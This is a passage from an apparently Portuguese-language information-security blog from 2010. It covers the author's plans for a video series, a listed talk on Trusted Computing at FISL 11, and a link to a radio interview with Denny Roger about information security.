2º - vou ter que dar meu jeito pra aprender a editar vídeos no Linux :-) (mas nada é impossível, afinal, se consegui aprender grego na faculdade através de uma apostila em alemão, consigo aprender qualquer coisa - espero que essa afirmativa tbm se aplique a aprender a dirigir...rs).

Bem, é isso. Espero em breve retornar já com nosso primeiro vídeo, cujo tema será "segurança da informação no Brasil, qual nossa realidade", baseado em um artigo meu, escrito há tempos atrás.

Abraço à todos!

Trusted Computing - palestra ministrada no FISL 11 - 2010

2010-09-10T11:25:00.000-03:00

View more presentations from luizvieira.

Entrevista sobre segurança da informação

2010-09-09T09:20:00.001-03:00

Entrevista com Denny Roger, fundador da EPSEC, empresa especializada em segurança da informação, e membro do ABNT/CB21, Comitê Brasileiro sobre as normas de gestão de segurança da informação.

Acesse:

http://cbn.globoradio.globo.com/programas/jornal-da-cbn/2010/09/09/SEGURANCA-DA-INFORMACAO-E-A-PRINCIPAL-PREOCUPACAO-DAS-EMPRESAS-SEGUNDO-PESQUISA.htm